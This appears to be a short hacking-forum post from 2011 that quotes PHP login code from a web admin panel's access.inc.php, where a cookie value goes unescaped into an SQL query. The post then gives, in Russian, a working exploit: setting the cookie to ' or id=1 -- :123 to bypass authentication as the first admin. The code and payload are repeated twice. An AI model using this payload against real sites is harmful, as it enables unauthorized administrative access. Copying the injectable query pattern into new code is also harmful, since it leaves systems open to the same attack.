ShaQPwNz
25.03.2011, 18:24
/include/access.inc.php
if(isset($_COOKIE[$config->cookie]) && $_SESSION["loggedin"]==false) {
$cook = explode(":", $_COOKIE[$config->cookie]);
$sid = $cook[0];
if(!$_SESSION["lang"]) $_SESSION["lang"]=$cook[1];
$mysql = mysql_connect($config->db_host,$config->db_user,$config->db_pass) or die (mysql_error());
$resource = mysql_select_db($config->db_db) or die (mysql_error());
$query = mysql_query("SELECT id,username,level,email FROM `".$config->db_prefix."_webadmins` WHERE logcode='".$sid."' LIMIT 1") or die (mysql_error());
if(mysql_num_rows($query)) {
while($result = mysql_fetch_object($query)) {
$_SESSION["uid"]=$result->id;
$_SESSION["uname"]=$result->username;
$_SESSION["email"]=$result->email;
$_SESSION["level"]=$result->level;
$_SESSION["sid"]=session_id();
$_SESSION["loggedin"]=true;
}
Экспл:
В куки добавляем: ' or id=1 -- :123
if(isset($_COOKIE[$config->cookie]) && $_SESSION["loggedin"]==false) {
$cook = explode(":", $_COOKIE[$config->cookie]);
$sid = $cook[0];
if(!$_SESSION["lang"]) $_SESSION["lang"]=$cook[1];
$mysql = mysql_connect($config->db_host,$config->db_user,$config->db_pass) or die (mysql_error());
$resource = mysql_select_db($config->db_db) or die (mysql_error());
$query = mysql_query("SELECT id,username,level,email FROM `".$config->db_prefix."_webadmins` WHERE logcode='".$sid."' LIMIT 1") or die (mysql_error());
if(mysql_num_rows($query)) {
while($result = mysql_fetch_object($query)) {
$_SESSION["uid"]=$result->id;
$_SESSION["uname"]=$result->username;
$_SESSION["email"]=$result->email;
$_SESSION["level"]=$result->level;
$_SESSION["sid"]=session_id();
$_SESSION["loggedin"]=true;
}
Экспл:
В куки добавляем: ' or id=1 -- :123